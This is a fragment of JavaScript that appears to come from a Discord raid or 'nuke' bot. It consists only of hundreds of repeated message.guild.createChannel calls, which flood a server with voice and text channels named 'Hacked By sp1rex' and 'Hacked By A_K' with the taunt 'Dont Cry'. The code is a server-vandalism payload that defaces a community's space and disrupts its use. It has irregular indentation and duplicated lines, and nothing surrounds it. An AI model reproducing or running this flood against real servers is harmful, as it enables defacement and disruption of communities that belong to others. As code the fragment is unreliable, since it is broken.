		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
